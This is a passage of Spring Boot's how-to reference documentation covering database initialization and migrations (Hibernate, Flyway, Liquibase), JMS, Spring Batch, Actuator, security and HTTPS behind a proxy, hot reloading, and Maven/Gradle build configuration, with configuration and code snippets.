This is controlled through two external properties:\n\n* `spring.jpa.generate-ddl` (boolean) switches the feature on and off and is vendor\nindependent.\n* `spring.jpa.hibernate.ddl-auto` (enum) is a Hibernate feature that controls the\nbehavior in a more fine-grained way. This feature is described in more detail later in\nthis guide.\n\n\n\n[[howto-initialize-a-database-using-hibernate]]\n=== Initialize a Database Using Hibernate\nYou can set `spring.jpa.hibernate.ddl-auto` explicitly and the standard Hibernate property\nvalues are `none`, `validate`, `update`, `create`, and `create-drop`. Spring Boot chooses\na default value for you based on whether it thinks your database is embedded. It defaults\nto `create-drop` if no schema manager has been detected or `none` in all other cases. An\nembedded database is detected by looking at the `Connection` type. `hsqldb`, `h2`, and\n`derby` are embedded, and others are not. Be careful when switching from in-memory to a\n'`real`' database that you do not make assumptions about the existence of the tables and\ndata in the new platform. You either have to set `ddl-auto` explicitly or use one of the\nother mechanisms to initialize the database.\n\nNOTE: You can output the schema creation by enabling the `org.hibernate.SQL` logger. This\nis done for you automatically if you enable the\n<<boot-features-logging-console-output,debug mode>>.\n\nIn addition, a file named `import.sql` in the root of the classpath is executed on\nstartup if Hibernate creates the schema from scratch (that is, if the `ddl-auto` property\nis set to `create` or `create-drop`). This can be useful for demos and for testing if you\nare careful but is probably not something you want to be on the classpath in production.\nIt is a Hibernate feature (and has nothing to do with Spring).\n\n\n[[howto-initialize-a-database-using-spring-jdbc]]\n=== Initialize a Database\nSpring Boot can automatically create the schema (DDL scripts) of your `DataSource` and\ninitialize it (DML scripts). It loads SQL from the standard root classpath locations:\n`schema.sql` and `data.sql`, respectively. In addition, Spring Boot processes the\n`schema-${platform}.sql` and `data-${platform}.sql` files (if present), where `platform`\nis the value of `spring.datasource.platform`. This allows you to switch to\ndatabase-specific scripts if necessary. For example, you might choose to set it to the\nvendor name of the database (`hsqldb`, `h2`, `oracle`, `mysql`, `postgresql`, and so on).\n\n[NOTE]\n====\nSpring Boot automatically creates the schema of an embedded `DataSource`. This behaviour\ncan be customized by using the `spring.datasource.initialization-mode` property. For\ninstance, if you want to always initialize the `DataSource` regardless of its type:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.datasource.initialization-mode=always\n----\n====\n\nBy default, Spring Boot enables the fail-fast feature of the Spring JDBC initializer. This\nmeans that, if the scripts cause exceptions, the application fails to start. You can tune\nthat behavior by setting `spring.datasource.continue-on-error`.\n\nNOTE: In a JPA-based app, you can choose to let Hibernate create the schema or use\n`schema.sql`, but you cannot do both. 
Make sure to disable\n`spring.jpa.hibernate.ddl-auto` if you use `schema.sql`.\n\n\n\n[[howto-initialize-a-spring-batch-database]]\n=== Initialize a Spring Batch Database\nIf you use Spring Batch, it comes pre-packaged with SQL initialization scripts for most\npopular database platforms. Spring Boot can detect your database type and execute those\nscripts on startup. If you use an embedded database, this happens by default. You can also\nenable it for any database type, as shown in the following example:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.batch.initialize-schema=always\n----\n\nYou can also switch off the initialization explicitly by setting\n`spring.batch.initialize-schema=never`.\n\n\n\n[[howto-use-a-higher-level-database-migration-tool]]\n=== Use a Higher-level Database Migration Tool\nSpring Boot supports two higher-level migration tools: https:\/\/flywaydb.org\/[Flyway]\nand http:\/\/www.liquibase.org\/[Liquibase].\n\n[[howto-execute-flyway-database-migrations-on-startup]]\n==== Execute Flyway Database Migrations on Startup\nTo automatically run Flyway database migrations on startup, add the\n`org.flywaydb:flyway-core` to your classpath.\n\nThe migrations are scripts in the form `V<VERSION>__<NAME>.sql` (with `<VERSION>` an\nunderscore-separated version, such as '`1`' or '`2_1`'). By default, they are in a folder\ncalled `classpath:db\/migration`, but you can modify that location by setting\n`spring.flyway.locations`. This is a comma-separated list of one or more `classpath:`\nor `filesystem:` locations. For example, the following configuration would search for\nscripts in both the default classpath location and the `\/opt\/migration` directory:\n\n[source,properties,indent=0]\n----\n\tspring.flyway.locations=classpath:db\/migration,filesystem:\/opt\/migration\n----\n\nYou can also add a special `{vendor}` placeholder to use vendor-specific scripts. Assume\nthe following:\n\n[source,properties,indent=0]\n----\n\tspring.flyway.locations=classpath:db\/migration\/{vendor}\n----\n\nRather than using `db\/migration`, the preceding configuration sets the folder to use\naccording to the type of the database (such as `db\/migration\/mysql` for MySQL). The list\nof supported databases is available in\n{sc-spring-boot}\/jdbc\/DatabaseDriver.{sc-ext}[`DatabaseDriver`].\n\n{sc-spring-boot-autoconfigure}\/flyway\/FlywayProperties.{sc-ext}[`FlywayProperties`]\nprovides most of Flyway's settings and a small set of additional properties that can be\nused to disable the migrations or switch off the location checking. If you need more\ncontrol over the configuration, consider registering a `FlywayConfigurationCustomizer`\nbean.\n\nSpring Boot calls `Flyway.migrate()` to perform the database migration. If you would like\nmore control, provide a `@Bean` that implements\n{sc-spring-boot-autoconfigure}\/flyway\/FlywayMigrationStrategy.{sc-ext}[`FlywayMigrationStrategy`].\n\nFlyway supports SQL and Java https:\/\/flywaydb.org\/documentation\/callbacks.html[callbacks].\nTo use SQL-based callbacks, place the callback scripts in the `classpath:db\/migration`\nfolder. To use Java-based callbacks, create one or more beans that implement\n`Callback`. Any such beans are automatically registered with `Flyway`. They can be\nordered by using `@Order` or by implementing `Ordered`. 
Beans that implement the\ndeprecated `FlywayCallback` interface can also be detected, however they cannot be used\nalongside `Callback` beans.\n\nBy default, Flyway autowires the (`@Primary`) `DataSource` in your context and\nuses that for migrations. If you like to use a different `DataSource`, you can create\none and mark its `@Bean` as `@FlywayDataSource`. If you do so and want two data sources,\nremember to create another one and mark it as `@Primary`. Alternatively, you can use\nFlyway's native `DataSource` by setting `spring.flyway.[url,user,password]`\nin external properties. Setting either `spring.flyway.url` or `spring.flyway.user`\nis sufficient to cause Flyway to use its own `DataSource`. If any of the three\nproperties has not be set, the value of its equivalent `spring.datasource` property will\nbe used.\n\nThere is a {github-code}\/spring-boot-samples\/spring-boot-sample-flyway[Flyway sample] so\nthat you can see how to set things up.\n\nYou can also use Flyway to provide data for specific scenarios. For example, you can\nplace test-specific migrations in `src\/test\/resources` and they are run only when your\napplication starts for testing. Also, you can use profile-specific configuration to\ncustomize `spring.flyway.locations` so that certain migrations run only when a particular\nprofile is active. For example, in `application-dev.properties`, you might specify the\nfollowing setting:\n\n[source,properties,indent=0]\n----\n\tspring.flyway.locations=classpath:\/db\/migration,classpath:\/dev\/db\/migration\n----\n\nWith that setup, migrations in `dev\/db\/migration` run only when the `dev` profile is\nactive.\n\n\n\n[[howto-execute-liquibase-database-migrations-on-startup]]\n==== Execute Liquibase Database Migrations on Startup\nTo automatically run Liquibase database migrations on startup, add the\n`org.liquibase:liquibase-core` to your classpath.\n\nBy default, the master change log is read from `db\/changelog\/db.changelog-master.yaml`,\nbut you can change the location by setting `spring.liquibase.change-log`. In addition to\nYAML, Liquibase also supports JSON, XML, and SQL change log formats.\n\nBy default, Liquibase autowires the (`@Primary`) `DataSource` in your context and uses\nthat for migrations. If you need to use a different `DataSource`, you can create one and\nmark its `@Bean` as `@LiquibaseDataSource`. If you do so and you want two data sources,\nremember to create another one and mark it as `@Primary`. Alternatively, you can use\nLiquibase's native `DataSource` by setting `spring.liquibase.[url,user,password]` in\nexternal properties. Setting either `spring.liquibase.url` or `spring.liquibase.user`\nis sufficient to cause Liquibase to use its own `DataSource`. If any of the three\nproperties has not be set, the value of its equivalent `spring.datasource` property will\nbe used.\n\nSee\n{sc-spring-boot-autoconfigure}\/liquibase\/LiquibaseProperties.{sc-ext}[`LiquibaseProperties`]\nfor details about available settings such as contexts, the default schema, and others.\n\nThere is a {github-code}\/spring-boot-samples\/spring-boot-sample-liquibase[Liquibase\nsample] so that you can see how to set things up.\n\n\n\n[[howto-messaging]]\n== Messaging\n\nSpring Boot offers a number of starters that include messaging. 
This section answers\nquestions that arise from using messaging with Spring Boot.\n\n[[howto-jms-disable-transaction]]\n=== Disable Transacted JMS Session\nIf your JMS broker does not support transacted sessions, you have to disable the\nsupport of transactions altogether. If you create your own `JmsListenerContainerFactory`,\nthere is nothing to do, since, by default it cannot be transacted. If you want to use\nthe `DefaultJmsListenerContainerFactoryConfigurer` to reuse Spring Boot's default, you\ncan disable transacted sessions, as follows:\n\n[source,java,indent=0]\n----\n\t@Bean\n\tpublic DefaultJmsListenerContainerFactory jmsListenerContainerFactory(\n\t\t\tConnectionFactory connectionFactory,\n\t\t\tDefaultJmsListenerContainerFactoryConfigurer configurer) {\n\t\tDefaultJmsListenerContainerFactory listenerFactory =\n\t\t\t\tnew DefaultJmsListenerContainerFactory();\n\t\tconfigurer.configure(listenerFactory, connectionFactory);\n\t\tlistenerFactory.setTransactionManager(null);\n\t\tlistenerFactory.setSessionTransacted(false);\n\t\treturn listenerFactory;\n\t}\n----\n\nThe preceding example overrides the default factory, and it should be applied to any\nother factory that your application defines, if any.\n\n\n\n[[howto-batch-applications]]\n== Batch Applications\n\nThis section answers questions that arise from using Spring Batch with Spring Boot.\n\nNOTE: By default, batch applications require a `DataSource` to store job details. If you\nwant to deviate from that, you need to implement `BatchConfigurer`. See\n{spring-batch-javadoc}\/core\/configuration\/annotation\/EnableBatchProcessing.html[The\nJavadoc of `@EnableBatchProcessing`] for more details.\n\nFor more about Spring Batch, see the https:\/\/projects.spring.io\/spring-batch\/[Spring Batch\nproject page].\n\n\n\n[[howto-execute-spring-batch-jobs-on-startup]]\n=== Execute Spring Batch Jobs on Startup\nSpring Batch auto-configuration is enabled by adding `@EnableBatchProcessing`\n(from Spring Batch) somewhere in your context.\n\nBy default, it executes *all* `Jobs` in the application context on startup (see\n{sc-spring-boot-autoconfigure}\/batch\/JobLauncherCommandLineRunner.{sc-ext}[JobLauncherCommandLineRunner]\nfor details). You can narrow down to a specific job or jobs by specifying\n`spring.batch.job.names` (which takes a comma-separated list of job name patterns).\n\n[TIP]\n.Specifying job parameters on the command line\n====\nUnlike command line option arguments that\n<<spring-boot-features.adoc#boot-features-external-config-command-line-args,set properties\nin the `Environment`>> (i.e. by starting with `--`, such as\n`--my-property=value`), job parameters have to be specified on the command line without\ndashes (e.g. `jobParam=value`).\n====\n\nIf the application context includes a `JobRegistry`, the jobs in\n`spring.batch.job.names` are looked up in the registry instead of being autowired from the\ncontext. This is a common pattern with more complex systems, where multiple jobs are\ndefined in child contexts and registered centrally.\n\nSee\n{sc-spring-boot-autoconfigure}\/batch\/BatchAutoConfiguration.{sc-ext}[BatchAutoConfiguration]\nand\nhttps:\/\/github.com\/spring-projects\/spring-batch\/blob\/master\/spring-batch-core\/src\/main\/java\/org\/springframework\/batch\/core\/configuration\/annotation\/EnableBatchProcessing.java[@EnableBatchProcessing]\nfor more details.\n\n\n\n[[howto-actuator]]\n== Actuator\n\nSpring Boot includes the Spring Boot Actuator. 
This section answers questions that often\narise from its use.\n\n[[howto-change-the-http-port-or-address-of-the-actuator-endpoints]]\n=== Change the HTTP Port or Address of the Actuator Endpoints\nIn a standalone application, the Actuator HTTP port defaults to the same as the main HTTP\nport. To make the application listen on a different port, set the external property:\n`management.server.port`. To listen on a completely different network address (such as\nwhen you have an internal network for management and an external one for user\napplications), you can also set `management.server.address` to a valid IP address to which\nthe server is able to bind.\n\nFor more detail, see the\n{sc-spring-boot-actuator-autoconfigure}\/web\/server\/ManagementServerProperties.{sc-ext}[`ManagementServerProperties`]\nsource code and\n\"`<<production-ready-features.adoc#production-ready-customizing-management-server-port>>`\"\nin the \"`Production-ready features`\" section.\n\n\n\n[[howto-customize-the-whitelabel-error-page]]\n=== Customize the '`whitelabel`' Error Page\nSpring Boot installs a '`whitelabel`' error page that you see in a browser client if\nyou encounter a server error (machine clients consuming JSON and other media types should\nsee a sensible response with the right error code).\n\nNOTE: Set `server.error.whitelabel.enabled=false` to switch the default error page off.\nDoing so restores the default of the servlet container that you are using. Note that\nSpring Boot still tries to resolve the error view, so you should probably add your own\nerror page rather than disabling it completely.\n\nOverriding the error page with your own depends on the templating technology that you\nuse. For example, if you use Thymeleaf, you can add an `error.html` template.\nIf you use FreeMarker, you can add an `error.ftl` template. In general, you\nneed a `View` that resolves with a name of `error` or a `@Controller` that handles\nthe `\/error` path. Unless you replaced some of the default configuration, you should find\na `BeanNameViewResolver` in your `ApplicationContext`, so a `@Bean` named `error` would\nbe a simple way of doing that. See\n{sc-spring-boot-autoconfigure}\/web\/servlet\/error\/ErrorMvcAutoConfiguration.{sc-ext}[`ErrorMvcAutoConfiguration`]\nfor more options.\n\nSee also the section on \"`<<boot-features-error-handling, Error Handling>>`\" for details\nof how to register handlers in the servlet container.\n\n\n\n[[howto-sanitize-sensible-values]]\n=== Sanitize sensible values\nInformation returned by the `env` and `configprops` endpoints can be somewhat sensitive\nso keys matching a certain pattern are sanitized by default (i.e. their values are\nreplaced by `+******+`).\n\nSpring Boot uses sensible defaults for such keys: for instance, any key ending with the\nword \"password\", \"secret\", \"key\" or \"token\" is sanitized. 
It is also possible to use a\nregular expression instead, such as `+*credentials.*+` to sanitize any key that holds the\nword `credentials` as part of the key.\n\nThe patterns to use can be customized using the `management.endpoint.env.keys-to-sanitize`\nand `management.endpoint.configprops.keys-to-sanitize` respectively.\n\n\n\n[[howto-security]]\n== Security\n\nThis section addresses questions about security when working with Spring Boot, including\nquestions that arise from using Spring Security with Spring Boot.\n\nFor more about Spring Security, see the {spring-security}[Spring Security project page].\n\n\n\n[[howto-switch-off-spring-boot-security-configuration]]\n=== Switch off the Spring Boot Security Configuration\nIf you define a `@Configuration` with a `WebSecurityConfigurerAdapter` in your application,\nit switches off the default webapp security settings in Spring Boot.\n\n\n[[howto-change-the-user-details-service-and-add-user-accounts]]\n=== Change the UserDetailsService and Add User Accounts\nIf you provide a `@Bean` of type `AuthenticationManager`, `AuthenticationProvider`,\nor `UserDetailsService`, the default `@Bean` for `InMemoryUserDetailsManager` is not\ncreated, so you have the full feature set of Spring Security available (such as\nhttps:\/\/docs.spring.io\/spring-security\/site\/docs\/current\/reference\/htmlsingle\/#jc-authentication[various\nauthentication options]).\n\nThe easiest way to add user accounts is to provide your own `UserDetailsService` bean.\n\n\n\n[[howto-enable-https]]\n=== Enable HTTPS When Running behind a Proxy Server\nEnsuring that all your main endpoints are only available over HTTPS is an important\nchore for any application. If you use Tomcat as a servlet container, then\nSpring Boot adds Tomcat's own `RemoteIpValve` automatically if it detects some\nenvironment settings, and you should be able to rely on the `HttpServletRequest` to\nreport whether it is secure or not (even downstream of a proxy server that handles the\nreal SSL termination). The standard behavior is determined by the presence or absence of\ncertain request headers (`x-forwarded-for` and `x-forwarded-proto`), whose names are\nconventional, so it should work with most front-end proxies. You can switch on the valve\nby adding some entries to `application.properties`, as shown in the following example:\n\n[source,properties,indent=0]\n----\n\tserver.tomcat.remote-ip-header=x-forwarded-for\n\tserver.tomcat.protocol-header=x-forwarded-proto\n----\n\n(The presence of either of those properties switches on the valve. Alternatively, you can\nadd the `RemoteIpValve` by adding a `TomcatServletWebServerFactory` bean.)\n\nTo configure Spring Security to require a secure channel for all (or some)\nrequests, consider adding your own `WebSecurityConfigurerAdapter` that adds the following\n`HttpSecurity` configuration:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Configuration\n\tpublic class SslWebSecurityConfigurerAdapter extends WebSecurityConfigurerAdapter {\n\n\t\t@Override\n\t\tprotected void configure(HttpSecurity http) throws Exception {\n\t\t\t\/\/ Customize the application security\n\t\t\thttp.requiresChannel().anyRequest().requiresSecure();\n\t\t}\n\n\t}\n----\n\n\n[[howto-hotswapping]]\n== Hot Swapping\n\nSpring Boot supports hot swapping. This section answers questions about how it works.\n\n\n\n[[howto-reload-static-content]]\n=== Reload Static Content\nThere are several options for hot reloading. 
The recommended approach is to use\n<<using-spring-boot.adoc#using-boot-devtools,`spring-boot-devtools`>>, as it provides\nadditional development-time features, such as support for fast application restarts\nand LiveReload as well as sensible development-time configuration (such as template\ncaching). Devtools works by monitoring the classpath for changes. This means that static\nresource changes must be \"built\" for the change to take affect. By default, this happens\nautomatically in Eclipse when you save your changes. In IntelliJ IDEA, the Make Project\ncommand triggers the necessary build. Due to the\n<<using-spring-boot.adoc#using-boot-devtools-restart-exclude, default restart\nexclusions>>, changes to static resources do not trigger a restart of your application.\nThey do, however, trigger a live reload.\n\nAlternatively, running in an IDE (especially with debugging on) is a good way to do\ndevelopment (all modern IDEs allow reloading of static resources and usually also allow\nhot-swapping of Java class changes).\n\nFinally, the <<build-tool-plugins.adoc#build-tool-plugins, Maven and Gradle plugins>> can\nbe configured (see the `addResources` property) to support running from the command line\nwith reloading of static files directly from source. You can use that with an external\ncss\/js compiler process if you are writing that code with higher-level tools.\n\n\n\n[[howto-reload-thymeleaf-template-content]]\n=== Reload Templates without Restarting the Container\nMost of the templating technologies supported by Spring Boot include a configuration\noption to disable caching (described later in this document). If you use the\n`spring-boot-devtools` module, these properties are\n<<using-spring-boot.adoc#using-boot-devtools-property-defaults,automatically configured>>\nfor you at development time.\n\n\n\n[[howto-reload-thymeleaf-content]]\n==== Thymeleaf Templates\nIf you use Thymeleaf, set `spring.thymeleaf.cache` to `false`. See\n{sc-spring-boot-autoconfigure}\/thymeleaf\/ThymeleafAutoConfiguration.{sc-ext}[`ThymeleafAutoConfiguration`]\nfor other Thymeleaf customization options.\n\n\n\n[[howto-reload-freemarker-content]]\n==== FreeMarker Templates\nIf you use FreeMarker, set `spring.freemarker.cache` to `false`. See\n{sc-spring-boot-autoconfigure}\/freemarker\/FreeMarkerAutoConfiguration.{sc-ext}[`FreeMarkerAutoConfiguration`]\nfor other FreeMarker customization options.\n\n\n\n[[howto-reload-groovy-template-content]]\n==== Groovy Templates\nIf you use Groovy templates, set `spring.groovy.template.cache` to `false`. See\n{sc-spring-boot-autoconfigure}\/groovy\/template\/GroovyTemplateAutoConfiguration.{sc-ext}[`GroovyTemplateAutoConfiguration`]\nfor other Groovy customization options.\n\n\n\n[[howto-reload-fast-restart]]\n=== Fast Application Restarts\nThe `spring-boot-devtools` module includes support for automatic application restarts.\nWhile not as fast as technologies such as\nhttp:\/\/zeroturnaround.com\/software\/jrebel\/[JRebel] it is usually significantly faster than\na \"`cold start`\". 
You should probably give it a try before investigating some of the more\ncomplex reload options discussed later in this document.\n\nFor more details, see the <<using-spring-boot.adoc#using-boot-devtools>> section.\n\n\n\n[[howto-reload-java-classes-without-restarting]]\n=== Reload Java Classes without Restarting the Container\nMany modern IDEs (Eclipse, IDEA, and others) support hot swapping of bytecode.\nConsequently, if you make a change that does not affect class or method signatures, it\nshould reload cleanly with no side effects.\n\n\n\n[[howto-build]]\n== Build\n\nSpring Boot includes build plugins for Maven and Gradle. This section answers common\nquestions about these plugins.\n\n\n\n[[howto-build-info]]\n=== Generate Build Information\nBoth the Maven plugin and the Gradle plugin allow generating build information containing\nthe coordinates, name, and version of the project. The plugins can also be configured\nto add additional properties through configuration. When such a file is present,\nSpring Boot auto-configures a `BuildProperties` bean.\n\nTo generate build information with Maven, add an execution for the `build-info` goal, as\nshown in the following example:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<version>{spring-boot-version}<\/version>\n\t\t\t\t<executions>\n\t\t\t\t\t<execution>\n\t\t\t\t\t\t<goals>\n\t\t\t\t\t\t\t<goal>build-info<\/goal>\n\t\t\t\t\t\t<\/goals>\n\t\t\t\t\t<\/execution>\n\t\t\t\t<\/executions>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nTIP: See the {spring-boot-maven-plugin-site}[Spring Boot Maven Plugin documentation]\nfor more details.\n\nThe following example does the same with Gradle:\n\n[source,groovy,indent=0,subs=\"verbatim,attributes\"]\n----\n\tspringBoot {\n\t\tbuildInfo()\n\t}\n----\n\nTIP: See the\n{spring-boot-gradle-plugin-reference}\/#integrating-with-actuator-build-info[Spring Boot\nGradle Plugin documentation] for more details.\n\n\n\n[[howto-git-info]]\n=== Generate Git Information\n\nBoth Maven and Gradle allow generating a `git.properties` file containing information\nabout the state of your `git` source code repository when the project was built.\n\nFor Maven users, the `spring-boot-starter-parent` POM includes a pre-configured plugin to\ngenerate a `git.properties` file. To use it, add the following declaration to your POM:\n\n[source,xml,indent=0]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>pl.project13.maven<\/groupId>\n\t\t\t\t<artifactId>git-commit-id-plugin<\/artifactId>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nGradle users can achieve the same result by using the\nhttps:\/\/plugins.gradle.org\/plugin\/com.gorylenko.gradle-git-properties[`gradle-git-properties`]\nplugin, as shown in the following example:\n\n[source,groovy,indent=0]\n----\n\tplugins {\n\t\tid \"com.gorylenko.gradle-git-properties\" version \"1.5.1\"\n\t}\n----\n\nTIP: The commit time in `git.properties` is expected to match the following format:\n`yyyy-MM-dd'T'HH:mm:ssZ`. This is the default format for both plugins listed above. 
Using\nthis format lets the time be parsed into a `Date` and its format, when serialized to JSON,\nto be controlled by Jackson's date serialization configuration settings.\n\n\n\n[[howto-customize-dependency-versions]]\n=== Customize Dependency Versions\nIf you use a Maven build that inherits directly or indirectly from\n`spring-boot-dependencies` (for instance, `spring-boot-starter-parent`) but you want to\noverride a specific third-party dependency, you can add appropriate `<properties>`\nelements. Browse the\n{github-code}\/spring-boot-project\/spring-boot-dependencies\/pom.xml[`spring-boot-dependencies`]\nPOM for a complete list of properties. For example, to pick a different `slf4j` version,\nyou would add the following property:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<properties>\n\t\t<slf4j.version>1.7.5<slf4j.version>\n\t<\/properties>\n----\n\nNOTE: Doing so only works if your Maven project inherits (directly or indirectly) from\n`spring-boot-dependencies`. If you have added `spring-boot-dependencies` in your\nown `dependencyManagement` section with `<scope>import<\/scope>`, you have to redefine\nthe artifact yourself instead of overriding the property.\n\nWARNING: Each Spring Boot release is designed and tested against this specific set of\nthird-party dependencies. Overriding versions may cause compatibility issues.\n\nTo override dependency versions in Gradle, see {spring-boot-gradle-plugin-reference}\/#managing-dependencies-customizing[this section]\nof the Gradle plugin's documentation.\n\n[[howto-create-an-executable-jar-with-maven]]\n=== Create an Executable JAR with Maven\nThe `spring-boot-maven-plugin` can be used to create an executable \"`fat`\" JAR. If you\nuse the `spring-boot-starter-parent` POM, you can declare the plugin and your jars are\nrepackaged as follows:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nIf you do not use the parent POM, you can still use the plugin. However, you must\nadditionally add an `<executions>` section, as follows:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<version>{spring-boot-version}<\/version>\n\t\t\t\t<executions>\n\t\t\t\t\t<execution>\n\t\t\t\t\t\t<goals>\n\t\t\t\t\t\t\t<goal>repackage<\/goal>\n\t\t\t\t\t\t<\/goals>\n\t\t\t\t\t<\/execution>\n\t\t\t\t<\/executions>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nSee the {spring-boot-maven-plugin-site}\/usage.html[plugin documentation] for full usage\ndetails.\n\n\n[[howto-create-an-additional-executable-jar]]\n=== Use a Spring Boot Application as a Dependency\nLike a war file, a Spring Boot application is not intended to be used as a dependency. If\nyour application contains classes that you want to share with other projects, the\nrecommended approach is to move that code into a separate module. The separate module can\nthen be depended upon by your application and other projects.\n\nIf you cannot rearrange your code as recommended above, Spring Boot's Maven and Gradle\nplugins must be configured to produce a separate artifact that is suitable for use as a\ndependency. 
The executable archive cannot be used as a dependency as the\n<<appendix-executable-jar-format.adoc#executable-jar-jar-file-structure,executable jar\nformat>> packages application classes in `BOOT-INF\/classes`. This means\nthat they cannot be found when the executable jar is used as a dependency.\n\nTo produce the two artifacts, one that can be used as a dependency and one that is\nexecutable, a classifier must be specified. This classifier is applied to the name of the\nexecutable archive, leaving the default archive for use as a dependency.\n\nTo configure a classifier of `exec` in Maven, you can use the following configuration:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<configuration>\n\t\t\t\t\t<classifier>exec<\/classifier>\n\t\t\t\t<\/configuration>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\n\n\n[[howto-extract-specific-libraries-when-an-executable-jar-runs]]\n=== Extract Specific Libraries When an Executable Jar Runs\nMost nested libraries in an executable jar do not need to be unpacked in order to run.\nHowever, certain libraries can have problems. For example, JRuby includes its own nested\njar support, which assumes that the `jruby-complete.jar` is always directly available as a\nfile in its own right.\n\nTo deal with any problematic libraries, you can flag that specific nested jars should be\nautomatically unpacked when the executable jar first runs. Such nested jars are written\nbeneath the temporary directory identified by the `java.io.tmpdir` system property.\n\nWARNING: Care should be taken to ensure that your operating system is configured so that\nit will not delete the jars that have been unpacked to the temporary directory while the\napplication is still running.\n\nFor example, to indicate that JRuby should be flagged for unpacking by using the Maven\nPlugin, you would add the following configuration:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<configuration>\n\t\t\t\t\t<requiresUnpack>\n\t\t\t\t\t\t<dependency>\n\t\t\t\t\t\t\t<groupId>org.jruby<\/groupId>\n\t\t\t\t\t\t\t<artifactId>jruby-complete<\/artifactId>\n\t\t\t\t\t\t<\/dependency>\n\t\t\t\t\t<\/requiresUnpack>\n\t\t\t\t<\/configuration>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\n\n\n[[howto-create-a-nonexecutable-jar]]\n=== Create a Non-executable JAR with Exclusions\nOften, if you have an executable and a non-executable jar as two separate build products,\nthe executable version has additional configuration files that are not needed in a library\njar. 
For example, the `application.yml` configuration file might by excluded from the\nnon-executable JAR.\n\nIn Maven, the executable jar must be the main artifact and you can add a classified jar\nfor the library, as follows:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t<\/plugin>\n\t\t\t<plugin>\n\t\t\t\t<artifactId>maven-jar-plugin<\/artifactId>\n\t\t\t\t<executions>\n\t\t\t\t\t<execution>\n\t\t\t\t\t\t<id>lib<\/id>\n\t\t\t\t\t\t<phase>package<\/phase>\n\t\t\t\t\t\t<goals>\n\t\t\t\t\t\t\t<goal>jar<\/goal>\n\t\t\t\t\t\t<\/goals>\n\t\t\t\t\t\t<configuration>\n\t\t\t\t\t\t\t<classifier>lib<\/classifier>\n\t\t\t\t\t\t\t<excludes>\n\t\t\t\t\t\t\t\t<exclude>application.yml<\/exclude>\n\t\t\t\t\t\t\t<\/excludes>\n\t\t\t\t\t\t<\/configuration>\n\t\t\t\t\t<\/execution>\n\t\t\t\t<\/executions>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\n\n\n[[howto-remote-debug-maven-run]]\n=== Remote Debug a Spring Boot Application Started with Maven\nTo attach a remote debugger to a Spring Boot application that was started with Maven, you\ncan use the `jvmArguments` property of the {spring-boot-maven-plugin-site}[maven plugin].\n\nSee {spring-boot-maven-plugin-site}\/examples\/run-debug.html[this example] for more\ndetails.\n\n\n\n[[howto-build-an-executable-archive-with-ant]]\n=== Build an Executable Archive from Ant without Using `spring-boot-antlib`\nTo build with Ant, you need to grab dependencies, compile, and then create a jar or war\narchive. To make it executable, you can either use the `spring-boot-antlib`\nmodule or you can follow these instructions:\n\n. If you are building a jar, package the application's classes and resources in a nested\n`BOOT-INF\/classes` directory. If you are building a war, package the application's\nclasses in a nested `WEB-INF\/classes` directory as usual.\n. Add the runtime dependencies in a nested `BOOT-INF\/lib` directory for a jar or\n`WEB-INF\/lib` for a war. Remember *not* to compress the entries in the archive.\n. Add the `provided` (embedded container) dependencies in a nested `BOOT-INF\/lib`\ndirectory for a jar or `WEB-INF\/lib-provided` for a war. Remember *not* to compress the\nentries in the archive.\n. Add the `spring-boot-loader` classes at the root of the archive (so that the `Main-Class`\nis available).\n. 
